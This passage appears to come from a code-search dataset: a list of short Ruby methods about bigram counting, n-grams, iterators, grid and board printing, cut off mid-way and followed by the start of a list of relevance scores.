3055946,\n'DL' => 3050945,\n'NK' => 3043200,\n'CC' => 3026492,\n'UB' => 2990868,\n'RH' => 2968706,\n'NP' => 2968126,\n'JU' => 2924815,\n'FL' => 2890839,\n'DN' => 2840522,\n'KA' => 2833038,\n'PH' => 2825344,\n'HU' => 2771830,\n'JO' => 2721345,\n'LF' => 2702522,\n'YB' => 2696786,\n'RV' => 2692445,\n'OE' => 2616308,\n'IB' => 2598444,\n'IK' => 2585124,\n'YP' => 2581863,\n'GL' => 2576787,\n'LP' => 2543957,\n'YM' => 2516273,\n'LB' => 2463693,\n'HS' => 2462026,\n'DG' => 2442139,\n'GN' => 2426429,\n'EK' => 2411639,\n'NR' => 2393580,\n'PS' => 2377036,\n'TD' => 2346516,\n'LC' => 2328063,\n'SK' => 2321888,\n'YF' => 2305244,\n'YH' => 2291273,\n'VO' => 2253292,\n'AH' => 2225270,\n'DY' => 2218040,\n'LM' => 2216514,\n'SY' => 2214270,\n'NV' => 2194534,\n'YD' => 2122337,\n'FS' => 2047416,\n'SG' => 2043770,\n'YR' => 2021939,\n'YL' => 2013939,\n'WS' => 1988727,\n'MY' => 1949129,\n'OY' => 1932892,\n'KN' => 1903836,\n'IZ' => 1865802,\n'XP' => 1840696,\n'LW' => 1836811,\n'TN' => 1782119,\n'KO' => 1758001,\n'AA' => 1721143,\n'JA' => 1712763,\n'ZE' => 1709871,\n'FC' => 1570791,\n'GW' => 1567991,\n'TG' => 1530045,\n'XT' => 1509969,\n'FH' => 1507604,\n'LR' => 1505092,\n'JE' => 1487348,\n'YN' => 1485655,\n'GG' => 1468286,\n'GF' => 1465290,\n'EQ' => 1461436,\n'HY' => 1446451,\n'KT' => 1443985,\n'HC' => 1441057,\n'BS' => 1409672,\n'HW' => 1403223,\n'HN' => 1383958,\n'CS' => 1381608,\n'HM' => 1353001,\n'NJ' => 1342735,\n'HH' => 1329998,\n'WT' => 1301293,\n'GC' => 1299541,\n'LH' => 1274048,\n'EJ' => 1256993,\n'FM' => 1251312,\n'DV' => 1238565,\n'LV' => 1238287,\n'WR' => 1226755,\n'GP' => 1215204,\n'FP' => 1199845,\n'GB' => 1184377,\n'GM' => 1178511,\n'HL' => 1169468,\n'LK' => 1164186,\n'CY' => 1145316,\n'MC' => 1101727,\n'YG' => 1049082,\n'XI' => 1024736,\n'HB' => 1014004,\n'FW' => 1005903,\n'GY' => 979804,\n'HP' => 978649,\n'MW' => 937621,\n'PM' => 931225,\n'ZA' => 929119,\n'LG' => 926472,\n'IW' => 922059,\n'XA' => 904148,\n'FB' => 888155,\n'SV' => 882083,\n'GD' => 879792,\n'IX' => 879360,\n'AJ' => 870262,\n'KL' => 846309,\n'HF' => 834284,\n'HD' => 828755,\n'AE' => 815963,\n'SQ' => 800346,\n'DJ' => 799366,\n'FY' => 789961,\n'AZ' => 768359,\n'LN' => 752316,\n'AO' => 749566,\n'FD' => 748027,\n'KW' => 719633,\n'MF' => 715087,\n'MH' => 710864,\n'SJ' => 704442,\n'UF' => 701892,\n'TV' => 698150,\n'XC' => 697995,\n'YU' => 695512,\n'BB' => 689158,\n'WW' => 674610,\n'OJ' => 661082,\n'AX' => 660826,\n'MR' => 660619,\n'WL' => 657782,\n'XE' => 653947,\n'KH' => 650095,\n'OX' => 650078,\n'UO' => 649906,\n'ZI' => 644035,\n'FG' => 637758,\n'IH' => 610683,\n'TK' => 610333,\n'II' => 607124,\n'IU' => 576683,\n'TJ' => 559473,\n'MN' => 558397,\n'WY' => 553647,\n'KY' => 553296,\n'KF' => 537342,\n'FN' => 534362,\n'UY' => 531960,\n'PW' => 530411,\n'DK' => 525744,\n'RJ' => 518157,\n'UK' => 514873,\n'KR' => 507020,\n'KU' => 506618,\n'WM' => 505687,\n'KM' => 485617,\n'MD' => 481126,\n'ML' => 478528,\n'EZ' => 465466,\n'KB' => 457860,\n'WC' => 448394,\n'WD' => 432646,\n'HG' => 429607,\n'BT' => 428276,\n'ZO' => 424016,\n'KC' => 420017,\n'PF' => 418168,\n'YV' => 411487,\n'PC' => 400308,\n'PY' => 396147,\n'WB' => 394820,\n'YK' => 391953,\n'CP' => 382923,\n'YJ' => 378679,\n'KP' => 375653,\n'PB' => 369336,\n'CD' => 358435,\n'JI' => 357577,\n'UW' => 352732,\n'UH' => 339341,\n'WF' => 336213,\n'YY' => 332973,\n'WP' => 321746,\n'BC' => 320380,\n'AQ' => 315068,\n'CB' => 298053,\n'IQ' => 291635,\n'CM' => 285942,\n'MG' => 285133,\n'DQ' => 283314,\n'BJ' => 282608,\n'TZ' => 280007,\n'KD' => 277982,\n'PD' => 273162,\n'FJ' => 269865,\n'CF' => 267630,\n'NZ' => 266461,\n'CW' => 257253,\n'FV' => 244685,\n'VY' => 233082,\n'FK' => 228905,\n'OZ' => 228556,\n'ZZ' => 221275,\n'IJ' => 219128,\n'LJ' => 218362,\n'NQ' => 217422,\n'UV' => 212051,\n'XO' => 211173,\n'PG' => 211133,\n'HK' => 210385,\n'KG' => 209266,\n'VS' => 204093,\n'HV' => 197539,\n'BM' => 191807,\n'HJ' => 189906,\n'CN' => 188046,\n'GV' => 186777,\n'CG' => 181590,\n'WU' => 180884,\n'GJ' => 176947,\n'XH' => 166599,\n'GK' => 163830,\n'TQ' => 159111,\n'CQ' => 157546,\n'RQ' => 156933,\n'BH' => 154489,\n'XS' => 154347,\n'UZ' => 153736,\n'WK' => 148964,\n'XU' => 147533,\n'UX' => 144814,\n'BD' => 141752,\n'BW' => 140189,\n'WG' => 139890,\n'MV' => 136314,\n'MJ' => 134263,\n'PN' => 131645,\n'XM' => 127492,\n'OQ' => 122677,\n'BV' => 120081,\n'XW' => 119322,\n'KK' => 118811,\n'BP' => 115161,\n'ZU' => 113538,\n'RZ' => 113432,\n'XF' => 113031,\n'MK' => 111041,\n'ZH' => 107639,\n'BN' => 106125,\n'ZY' => 105871,\n'HQ' => 101241,\n'WJ' => 99435,\n'IY' => 98361,\n'DZ' => 98038,\n'VR' => 96416,\n'ZS' => 94993,\n'XY' => 94329,\n'CV' => 94224,\n'XB' => 94041,\n'XR' => 90046,\n'UJ' => 88168,\n'YQ' => 87953,\n'VD' => 85611,\n'PK' => 83017,\n'VU' => 82830,\n'JR' => 80471,\n'ZL' => 80039,\n'SZ' => 79840,\n'YZ' => 78281,\n'LQ' => 77148,\n'KJ' => 76816,\n'BF' => 75352,\n'NX' => 74844,\n'QA' => 73527,\n'QI' => 73387,\n'KV' => 73184,\n'ZW' => 68865,\n'WV' => 63930,\n'UU' => 63043,\n'VT' => 62912,\n'VP' => 62577,\n'XD' => 60101,\n'GQ' => 59750,\n'XL' => 59585,\n'VC' => 59024,\n'CZ' => 57914,\n'LZ' => 57314,\n'ZT' => 56955,\n'WZ' => 52836,\n'SX' => 50975,\n'ZB' => 50652,\n'VL' => 49032,\n'PV' => 48105,\n'FQ' => 47504,\n'PJ' => 47043,\n'ZM' => 46034,\n'VW' => 45608,\n'CJ' => 41526,\n'ZC' => 41037,\n'BG' => 40516,\n'JS' => 39326,\n'XG' => 39289,\n'RX' => 38654,\n'HZ' => 37066,\n'XX' => 35052,\n'VM' => 35024,\n'XN' => 34734,\n'QW' => 34669,\n'JP' => 34520,\n'VN' => 33082,\n'ZD' => 32906,\n'ZR' => 32685,\n'FZ' => 31186,\n'XV' => 31117,\n'ZP' => 30389,\n'VH' => 30203,\n'VB' => 29192,\n'ZF' => 28658,\n'GZ' => 28514,\n'TX' => 28156,\n'VF' => 28090,\n'DX' => 27413,\n'QB' => 27307,\n'BK' => 26993,\n'ZG' => 26369,\n'VG' => 25585,\n'JC' => 24770,\n'ZK' => 24262,\n'ZN' => 24241,\n'UQ' => 23386,\n'JM' => 22338,\n'VV' => 22329,\n'JD' => 21903,\n'MQ' => 21358,\n'JH' => 20960,\n'QS' => 20847,\n'JT' => 20408,\n'JB' => 19380,\n'FX' => 19313,\n'PQ' => 18607,\n'MZ' => 18271,\n'YX' => 16945,\n'QT' => 16914,\n'WQ' => 16245,\n'JJ' => 16085,\n'JW' => 16083,\n'LX' => 15467,\n'GX' => 14778,\n'JN' => 14452,\n'ZV' => 14339,\n'MX' => 14250,\n'JK' => 13967,\n'KQ' => 13905,\n'XK' => 13651,\n'JF' => 12640,\n'QM' => 12315,\n'QH' => 12273,\n'JL' => 12149,\n'JG' => 12023,\n'VK' => 11469,\n'VJ' => 11432,\n'KZ' => 11192,\n'QC' => 10667,\n'XJ' => 10629,\n'PZ' => 9697,\n'QL' => 9603,\n'QO' => 9394,\n'JV' => 8925,\n'QF' => 8778,\n'QD' => 8678,\n'BZ' => 8132,\n'HX' => 7526,\n'ZJ' => 7167,\n'PX' => 6814,\n'QP' => 6062,\n'QE' => 6020,\n'QR' => 5975,\n'ZQ' => 5773,\n'JY' => 5723,\n'BQ' => 5513,\n'XQ' => 5416,\n'CX' => 5300,\n'KX' => 5083,\n'WX' => 4678,\n'QY' => 4557,\n'QV' => 4212,\n'QN' => 3808,\n'VX' => 3192,\n'BX' => 3021,\n'JZ' => 2859,\n'VZ' => 2633,\n'QG' => 2567,\n'QQ' => 2499,\n'ZX' => 2463,\n'XZ' => 2082,\n'QK' => 2023,\n'VQ' => 1488,\n'QJ' => 1342,\n'QX' => 765,\n'JX' => 747,\n'JQ' => 722,\n'QZ' => 280\n}\n end",
"def each\r\n 3.times do |i|\r\n 3.times do |j|\r\n yield(@table[i][j], i, j)\r\n end\r\n end\r\n\r\n self # Chainability! Yay!\r\n end",
"def each\n while row=self.next\n yield row\n end\n end",
"def each\n while row=self.next\n yield row\n end\n end",
"def each_cell\n\t\teach_row do |row|\n\t\t\trow.each do |cell|\n\t\t\t\tyield cell if cell\n\t\t\tend\n\t\tend\n\tend",
"def bigramate(word)\n (0..(word.length - 2)).map { |i| word.slice(i, 2) }\n end",
"def each(&block)\n table.values.each(&block)\n end",
"def tally!(file_count)\n @table.each do |words, bigram|\n bigram.tally!(table.size, file_count)\n end\n end",
"def gen_bigrams(a)\n bigrams = a.zip(a[1..-1])\n bigrams.pop # remove last useless one [lastitem, nil]\n return bigrams\nend",
"def imprime_triangulo(base)\n for linha in (1..base)\n for coluna in (1..linha)\n print \"*\"\n end\n puts\n end \nend",
"def each(&block)\n @table.values.each(&block)\n end",
"def each\n filas.times do |i|\n columnas.times do |j|\n yield self[i,j]\n end\n end\n end",
"def each( )\n\t\t\tsquares = (\"a\"..\"h\").map do |file|\n\t\t\t\t(1..8).map { |rank| \"#{file}#{rank}\" }\n\t\t\tend.flatten.each do |square|\n\t\t\t\tyield [square, @squares[square]]\n\t\t\tend\n\t\tend",
"def construct_bigram(title)\n\t#eliminate stop words before creating bigram counts\n\tpattern = /a\\b|an\\b|and\\b|by\\b|for\\b|from\\b|in\\b|of\\b|on\\b|or\\b|out\\b|the\\b|to\\b|with\\b/ #\\b to match the end of the word so it doesnt grab an when the word is and\n\ttitle.gsub!(pattern,\"\")\n\n\ttitle_array = title.split #split the title by words. (splits by spaces by default)\n\n\tfor i in 0..title_array.length-2\n\t\t$bigrams[title_array[i]]\n\t\tif $bigrams[title_array[i]] == nil #when the key/second hash does not exist, create a new one and initialize to 0 so we can increment\n\t\t\t$bigrams[title_array[i]] = Hash.new(0)\n\t\tend\n\t\t#increment value for the key by one\n\t\t$bigrams[title_array[i]][title_array[i+1]] += 1\n\tend\nend",
"def print_letters(screen)\n (0..9).each do |multiplier|\n screen.each do |row|\n beg = 5*multiplier\n ending = 5*(multiplier+1)\n puts row[beg...ending].join\n end\n\n puts \"**************************************\"\n end\nend",
"def generate_table(grammar)\n branch_index = 0\n term_indices = grammar.terminal_indices\n columns = grammar.terminals.length + 1\n\n table = Array.new(grammar.rules.length) do\n Array.new(columns, -1)\n end\n\n grammar.rules.each_with_index do |rule, rule_index|\n rule.branches.each do |branch|\n branch.first_set.each do |step|\n # For terminals we'll base the column index on the terminal index.\n if step.is_a?(Terminal)\n terminal_index = term_indices[step]\n\n table[rule_index][terminal_index + 1] = branch_index\n\n # For the rest (= epsilon) we'll update all columns that haven't\n # been updated yet.\n else\n table[rule_index].each_with_index do |col, col_index|\n table[rule_index][col_index] = branch_index if col == -1\n end\n end\n end\n\n branch_index += 1\n end\n end\n\n return table\n end",
"def transliterate_brahmic!(time = 2, warmup = 1)\n ::Benchmark.ips do |x|\n x.config(time: time, warmup: warmup)\n TEST_STRINGS[:brahmic].to_a.product(TEST_STRINGS_FLAT.keys).each do |(ak, av), bk|\n next if ak == bk\n x.report(\"#{ak} => #{bk}\") do\n Sanscript.transliterate(av, ak, bk)\n end\n end\n x.compare!\n end\n true\n end",
"def iterateUntappdTable\n step_size = 15\n (0..getUntappdCount).step(step_size) do |i|\n db.execute(\"SELECT * FROM #{@untappdTable} LIMIT #{step_size} OFFSET #{i}\").each do |beer|\n yield BeerModel.new(beer)\n end\n end\n end",
"def each(&block)\n @pz.each do |row|\n row.each do |cell|\n yield cell\n end\n end\n end",
"def dump_bigram_info_from_hash()\n\n cumulative_bigram_count = 0\n\n $bigram_count.keys.sort.each do |bigram|\n local_lead_word = bigram.split(/\\s/)[0] #shouldn't need to extract this each time\n cumulative_bigram_count += $bigram_count[bigram]\n cumulative_proportion = cumulative_bigram_count.to_f / $lead_word_count[local_lead_word].to_f\n puts sprintf(\"%s\\t%f\", bigram, cumulative_proportion )\n end\n\nend",
"def list_bombs\n list = []\n (0..8).each do |row|\n (0..8).each do |col|\n list << [row, col] if @board[[row, col]].bomb\n end\n end\n list\n end",
"def process_file(file_name)\n\tputs \"Processing File.... \"\n\tbegin\n\t\tIO.foreach(file_name, encoding: \"utf-8\") do |line|\t\t\t\t\t\t\t\t\t\t\t\t\t#for each line\n\t\t\ttitle = cleanup_title(line)\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t#clean up title\n\t\t\tif title != nil\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t#unless the title doesnt exist\n\t\t\t\twords = title.split(/\\s/)\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t#split the title into seperate words and remove all the stop words mentioned in the lab\n\t\t\t\twords.delete(\"a\")\n\t\t\t\twords.delete(\"an\")\n\t\t\t\twords.delete(\"and\")\n\t\t\t\twords.delete(\"by\")\n\t\t\t\twords.delete(\"for\")\n\t\t\t\twords.delete(\"from\")\n\t\t\t\twords.delete(\"in\")\n\t\t\t\twords.delete(\"of\")\n\t\t\t\twords.delete(\"on\")\n\t\t\t\twords.delete(\"or\")\n\t\t\t\twords.delete(\"out\")\n\t\t\t\twords.delete(\"the\")\n\t\t\t\twords.delete(\"to\")\n\t\t\t\twords.delete(\"with\")\n\t\t\t\t(0..words.size-2).each do |i|\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t# for the size of the words array minus two because we dont want to check bigrams of the last word\n\t\t\t\t\tif $bigrams[\"#{words[i]}\"][\"#{words[i+1]}\"].nil?\t\t\t\t\t\t\t\t\t\t#if the first layer doesnt contain the current word, add it with it's following word with a value of 1\n\t\t\t\t\t\t$bigrams[\"#{words[i]}\"].store(\"#{words[i+1]}\", 1)\n\t\t\t\t\telse\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t#otherwise, increment the value of the following key word\n\t\t\t\t\t\t$bigrams[\"#{words[i]}\"][\"#{words[i+1]}\"] += 1\n\t\t\t\t\tend\n\t\t\t\tend\n\t\t\tend\n\t\t\t#p $bigrams.values.inspect\n\t\tend\n\t\t#puts mcw(\"a\")\n\t\tputs \"Finished. Bigram model built.\\n\"\n\t#rescue\n\t\t#STDERR.puts \"Could not open file\"\n\t\t#exit 4\n\tend\nend",
"def each\n \ti = 0\n \twhile hijos[i] != nil\n \t\tyield hijos[i]\n \t\ti += 1\n \tend\n \tend",
"def kmp_table(word)\n\t\t\tn = word.capacity\n\t\t\tunless n >= 2\n\t\t\t\traise ArgumentError.new(\"expected n >= 2 but was #{n}\")\n\t\t\tend\n\t\t\ttable = Memory.new(n)\n\t\t\ttable[1] = 0\n\t\t\ti = 0\n\t\t\tj = 1\n\t\t\twhile j + 1 < n\n\t\t\t\tif word[i].eql?(word[j])\n\t\t\t\t\ti += 1\n\t\t\t\t\tj += 1\n\t\t\t\t\ttable[j] = i\n\t\t\t\telsif i != 0\n\t\t\t\t\ti = table[i]\n\t\t\t\telse\n\t\t\t\t\tj += 1\n\t\t\t\t\ttable[j] = i\n\t\t\t\tend\n\t\t\tend\n\t\t\treturn table\n\t\tend",
"def process_file(file_name)\r\n\tputs \"Processing File.... \"\r\n\r\n\tbegin\r\n\t\tcounter = Hash.new\r\n\t\tfile = File.open(file_name)\r\n\t\tuntil file.eof?\r\n\t\t\tfile.each_line do |line|\r\n\t\t\t\t# do something for each line\r\n\t\t\t\ttitle = cleanup_title(line)\r\n\t\t\t\tunless(title == \"\")\r\n\t\t\t\t\tbigram = title.split().each_cons(2).to_a\r\n\t\t\t\t\tbigram = bigram.map{ |n| n.join(' ')}\r\n\t\t\t\t\tbigram = bigram.each_with_object(Hash.new(0)){|word, obj| obj[word] += 1}\r\n\t\t\t\t\tif bigram.any?\r\n\t\t\t\t\t\tcounter.merge!(bigram) { |k, old, new| old + new}\r\n\t\t\t\t\tend\r\n\t\t\t\tend\r\n\t\t\tend\r\n\t\tend\r\n\t\tfile.close\r\n\r\n\t\t$bigramsArray = counter.sort_by { |k, v| -v }\r\n\t\tcreate_hash()\r\n\t\t#$bigrams = $bigrams.to_h\r\n\r\n\t\t#$bigramsHash = Hash.new\r\n\t\t#$bigramsHash = $bigrams.to_h\r\n \t#$bigrams.each { |k, v| puts \"#{v} => #{k}\"}\r\n\r\n\r\n\t\tputs \"Finished. Bigram model built.\\n\"\r\n\trescue\r\n\t\tSTDERR.puts \"Could not open file\"\r\n\t\texit 4\r\n\tend\r\n\r\nend",
"def ngram_analysis(str, n)\r\n # use a hash to store ngram - frequency mapping\r\n freq = Hash.new\r\n bigram = \"\"\r\n count = n-1\r\n i = 0\r\n\r\n # get the first ngram\r\n for i in 0..count\r\n bigram[i] = str[i]\r\n end\r\n\r\n freq[bigram] = 1\r\n\r\n str.each_char do |char|\r\n if i>=n then\r\n\r\n # bigram, trigram or quadrigram?\r\n bigram[0] = bigram[1]\r\n if n==2 then\r\n bigram[1] = char\r\n elsif n==3 then\r\n bigram[1] = bigram[2]\r\n bigram[2] = char\r\n elsif n==4 then\r\n bigram[1] = bigram[2]\r\n bigram[2] = bigram[3]\r\n bigram[3] = char\r\n end\r\n\r\n # updates values in the hash\r\n if freq.key?(bigram)==false then\r\n freq[bigram] = 1\r\n else \r\n freq[bigram] = freq[bigram]+1\r\n end\r\n\r\n end\r\n i = i + 1\r\n end\r\n\r\n # sort and print\r\n freq = freq.sort_by {|_key, value| value}.reverse.to_h\r\n i=0\r\n puts \"N-gram Analysis Results:\"\r\n freq.each do |key, value|\r\n if value!=1 && i<20 then\r\n puts key.to_s+\"\\t\"+value.to_s\r\n end\r\n i = i + 1\r\n end\r\nend",
"def update_bigram_counts(words)\n\t(0..(words.length - 2)).each do |i|\n\t\tkey = words[i]\n\t\tif $bigrams.has_key? key\n\t\t\tcounts = $bigrams[key]\n\t\t\tif counts.has_key? words[i + 1]\n\t\t\t\tcounts[words[i + 1]] += 1\n\t\t\telse\n\t\t\t\tcounts[words[i + 1]] = 1\n\t\t\tend\n\t\telse\n\t\t\tcounts = {words[i + 1] => 1}\n\t\t\t$bigrams[key] = counts\n\t\tend\n\tend\nend",
"def my_map\n array = []\n self.my_each do |word|\n array << yield(word)\n end\n return array\n end",
"def each\r\n assert_exists\r\n arr_cells = cells\r\n for i in 0..arr_cells.length - 1 do\r\n yield arr_cells[i]\r\n end\r\n end",
"def next_iteration\n morpheme_hypotheses = hypothesize_morphemes\n return [] if morpheme_hypotheses.empty?\n equivalence_classes = collect_morpheme_hypotheses(morpheme_hypotheses)\n new_morphemes = equivalence_classes.new_morphemes\n insert_morphemes_into_analyses(new_morphemes)\n end",
"def _each\n Engine.new(local_copy.encoded_io, csv_options.merge(headers: headers)).each do |row|\n\n some_value_present = false\n\n if not headers\n\n # represent the row as an array\n array = row.map do |v|\n v = RemoteTable.normalize_whitespace v\n if not some_value_present and not keep_blank_rows and v.present?\n some_value_present = true\n end\n v\n end\n if some_value_present or keep_blank_rows\n yield array\n end\n\n else\n\n # represent the row as a hash\n hash = ::ActiveSupport::OrderedHash.new\n row.each do |k, v|\n v = RemoteTable.normalize_whitespace v\n if not some_value_present and not keep_blank_rows and v.present?\n some_value_present = true\n end\n hash[k] = v\n end\n if some_value_present or keep_blank_rows\n yield hash\n end\n\n end\n end\n ensure\n local_copy.cleanup\n end",
"def pangram_search(words, &block)\n # Bust out if we've found enough pangrams\n raise AllDone.new if @max_count != 0 && @count > @max_count\n \n h = LetterHistogram.new words\n\n # If we already have more words or more repeats, then no need to look any\n # further, we should backtrack and try something else.\n return if words.size >= @min_size && h.repeats >= @min_repeats\n\n # This pangram is somehow minimal, so pass to the block\n if h.pangram?\n @min_size = words.size if words.size < @min_size\n @min_repeats = h.repeats if h.repeats < @min_repeats\n @count += 1\n yield words,h\n return\n end\n\n # No pangram yet, find children and descend\n new_words = @word_letters.least_common words,h\n new_words.each {|w| pangram_search words + [w], &block}\n end",
"def all_traversals(word)\n length = word.length\n results = []\n\n results << row_up(length)\n results << up_right(length)\n results << col_right(length)\n results << down_right(length)\n results << row_down(length)\n results << down_left(length)\n results << col_left(length)\n results << up_left(length)\n\n results\n end",
"def each\n @gens.each { |g| g.rewind }\n\n loop do\n count = 0\n\n ret = @gens.map { |g|\n if g.end?\n count += 1\n nil\n else\n g.next\n end\n }\n\n if count == @gens.size\n break\n end\n\n yield ret\n end\n\n self\n end",
"def each_pair\n return to_enum(__method__) { @table.size } unless block_given?\n @table.each_pair{|p| yield p}\n end",
"def each\n yield \"pizza\"\n yield \"spagetti\"\n yield \"salad\"\n yield \"bread\"\n yield \"water\"\n end",
"def each\r\n assert_exists\r\n arr_rows = rows\r\n for i in 0..arr_rows.length - 1 do\r\n yield arr_rows[i]\r\n end\r\n end",
"def word_search_board\n @grid.each do |r|\n puts r.map { |p| p }.join(\" \")\n end\n end",
"def pbEachPokemon\n for i in -1...$PokemonStorage.maxBoxes\n for j in 0...$PokemonStorage.maxPokemon(i)\n poke = $PokemonStorage[i][j]\n yield(poke,i) if poke\n end\n end\nend",
"def each_row\n @board.each do |row|\n yield row\n end\n end",
"def each &bloque\n # itera sobre todos los hijos de cada nodo\n # retorna cada hijo utilizando yield\n for elem in @hijos\n \tif (elem != nil)\n \tyield elem\n end\n end\n end",
"def each!\r\n each do |item, i, j|\r\n @table[i][j] = yield(@table[i][j], i, j) || @table[i][j]\r\n end\r\n\r\n self # Chainability! Yay!\r\n end",
"def times_table(rows)\n if rows > 0\n array = (1..rows).to_a\n\n i = 1\n while i <= rows\n puts array.map {|e| \"#{e*i} \"}.join(' ')\n i += 1\n end\n end\nend",
"def addtoB(title)\n\t#title = \"let's see what this is doing\"\n\tstops = [\" a \", \" an \", \" and \", \" by \", \" for \", \" from \", \" in \", \" of \", \" on \", \" or \", \" out \", \" the \", \" to \", \" width \"] # list of stop words\n\tfor word in stops do # go through the stop words: if they exist in the sentence, we will...\n\t\t\ttitle = title.gsub(word, \" \") # changes word to NOTHING! Well, a space I guess. but still.\n\t\tend\n\n\ttitle_words = title.split(\" \") # splits title into various words\n\n\twhile (title_words.length > 1)\n\t\tfirst_word = title_words[0] # saves the first word to title bigram\n\t\tnext_wrd = title_words[1] # the next word in the title is the one we want to add\n\t\ttitle_words = title_words[1..-1] # chops off the first word and proceeds through\n\n\t\tif ($bigrams.has_key?(first_word)) # if we already have a key, we don't need a new hash\n\t\t\t# do nothing\n\t\telse\n\t\t\t$bigrams[first_word] = Hash.new # if word hasn't been encountered before, give it a new hash\n\t\tend\n\t\t\t\tif ($bigrams[first_word].has_key?(next_wrd)) # if the next word exists for the current word...\n\t\t\t\t\t$bigrams[first_word][next_wrd] = $bigrams[first_word][next_wrd] + 1 # then all we're doing is incrementing the count for that word by one.\n\t\t\t\telse\n\t\t\t\t$bigrams[first_word].merge!(next_wrd => 1) # otherwise, we will set the count of that word to one.\n\t\t\tend\n\t\tend\n\tend",
"def index\n\t\t@antibiograms = Antibiogram.all\n\tend",
"def times_table(rows)\n 1.upto(rows) do |y|\n puts\n 1.upto(rows) { |x| print \"#{x * y} \"}\n end\nend",
"def each\n @cols.length.times do |i|\n @rows.length.times do |j|\n yield [i, j]\n end\n end\n end",
"def ngrams(len = 1)\n ngrams = []\n len = size if len > size\n (0..size - len).each do |n|\n ng = self[n...(n + len)]\n ngrams.push(ng)\n yield ng if block_given?\n end\n ngrams\n end",
"def each_row\n end",
"def mostrar_tablero(tablero)\r\n for i in (0...3)\r\n for j in (0...3)\r\n print tablero[i][j]\r\n\t\t\tprint \" \"\r\n\t\tend\r\n\t\tprint \"\\n\"\r\n\tend\r\nend",
"def busca_n_gramas(indice_)\n encontrados = Array.new\n tamano_texto = @texto.length\n n_gramas = @texto.clone\n if indice_ > 7 || indice_ < 2\n puts \"Solo puedo darte de 2 a 7 -gramas\"\n return\n end\n arreglo = frecuencias(false)\n 10.times do |i|\n frecuen = arreglo[i]\n letra = frecuen[0]\n caracter = letra.dup\n j = 0\n sig = nil\n ant = nil\n while true\n en_texto = \"\" << n_gramas[j]\n if caracter.eql?(en_texto)\n sig = n_gramas[j...j+indice_]\n ant = n_gramas[j+1-indice_..j]\n rep_s = n_gramas.scan(sig).size\n rep_a = n_gramas.scan(ant).size\n if rep_s > 2\n salida = sig + \" -- \" + rep_s.to_s\n salida2 = ant + \" -- \" + rep_a.to_s\n puts salida\n puts salida2\n end\n break\n end#if\n j = j.succ \n end#e while\n end\n return encontrados\n end",
"def each\n\t\t@array.each do |v|\n\t\t\tyield v & 0x0F #Bottom Nibble\n\t\t\tyield (v >> 4) & 0x0F #Top Nibble\n\t\tend\n\tend",
"def each\n return to_enum(:each) unless block_given?\n @grid.each do |sub|\n sub.each do |cell|\n yield cell\n end\n end\n end",
"def each(&block)\n return enum_for :each unless block\n\n %x{\n for (var i = 0, length = #@native.rows.length; i < length; i++) {\n #{block.call(self[`i`])};\n }\n }\n\n self\n end",
"def each\n yield \"pizza\"\n yield \"spaghetti\"\n yield \"salad\"\n yield \"bread\"\n yield \"water\"\n end",
"def process_file(file_name)\n\tputs \"Processing File.... \"\n\n\tbegin\n\t\tall = Hash.new\n\t\tIO.foreach(file_name) do |line|\n\t\t\t# do something for each line\n\t\t\ttitle = cleanup_title(line)\n\t\t\tunless title.nil?\n\t\t\t\tgram = title.split().each_cons(2).to_a\n\t\t\t\tgram = gram.map{ |n| n.join(' ') }\n \t\t\t\tgram = gram.each_with_object(Hash.new(0)) { |word, obj| obj[word] += 1 }\n \t\t\t\tif gram.any?\n\t \t\t\t\tall.merge!(gram) { |k, old, new| old + new }\n\t \t\t\tend\n\t\t\tend\n\t\tend\n\t\t$bigramsArray = all.sort_by { |k, v| -v }\n\t\tcreate_hash()\n\t\tputs \"Finished. Bigram model built.\\n\"\n\trescue\n\t\tSTDERR.puts \"Could not open file\"\n\t\texit 4\n\tend\nend",
"def each\n @cells.each_with_index do |row, ir|\n row.each_with_index do |val, ic|\n yield ir, ic, val\n end\n end\n end",
"def each\n\t\tyield \"piaza\"\n\t\tyield \"spaghetti\"\n\t\tyield \"salad\"\n\t\tyield \"water\"\n\tend",
"def through; end",
"def each\n return unless @result\n\n @result.each(as: :hash, symbolize_keys: true) do |row|\n next unless row # This sometimes happens when streaming results...\n row = Hash[row.map { |k, v| [k, v.to_s] }] if @type_translation == :string\n yield row\n end\n end",
"def use_bigram(str,i)\n\t\tmax=@han[str[i]][0]\n\t\tif i==0\n\t\t\t@han[str[i]].each{|h|\n\t\t\t\tif ref(\"$\"+h)>ref(\"$\"+max)\n\t\t\t\t\tmax=h\n\t\t\t\tend\n\n\t\t\t}\n\t\telse\n\t\t\t\t@han[str[i]].each{|h|\n\t\t\t\tif ref(str[i-1]+h)>ref(str[i-1]+max)\n\t\t\t\t\tmax=h\n\t\t\t\tend\n\n\t\t\t}\n\t\tend\n\t\treturn max\n\n\tend",
"def each; end",
"def each; end",
"def each; end",
"def each; end",
"def each; end",
"def each; end",
"def each; end",
"def each; end",
"def each; end",
"def each; end",
"def each; end",
"def each\n nodo1 = @lista_alimentos.head\n nodo2 = @gramos.head\n while (nodo1 != nil && nodo2 != nil)\n yield nodo1.value\n nodo1 = nodo1.next\n nodo2 = nodo2.next\n end\n end",
"def each\n page = INDEX.result binding\n # strip space. This regex from http://stackoverflow.com/a/8828408/327815\n page.gsub!(%r%(?<=[\\^])\\t{2,}|(?<=[>])\\s{2,}(?=[<])|(?<=[>])\\s{2,11}(?=[<])|(?=[\\n])\\s{2,}%,\"\")\n page.each_line{|l| yield l }\n end",
"def each_table(&block)\n if block_given?\n @tables.each_value(&block)\n self\n else\n @tables.values\n end\n end",
"def iterateCrawlerTable\n step_size = 15\n (0..getCrawlerCount).step(step_size) do |i|\n db.execute(\"SELECT * FROM #{@crawlerTable} LIMIT #{step_size} OFFSET #{i}\").each do |beer|\n yield BeerModel.new(beer)\n end\n end\n end",
"def each\n # Include every to be inside enumerable:\n yield \"pizza\"\n yield \"spaghetti\"\n yield \"salad\"\n yield \"water\"\n yield \"bread\"\n end",
"def display_board\n for row in $game_board\n for square in row\n print square ? square.to_s + \" \" : \". \" \n end\n puts\n end\nend"
] | [
"0.8577058",
"0.6344053",
"0.62939036",
"0.6023376",
"0.596464",
"0.58545655",
"0.5687088",
"0.5656885",
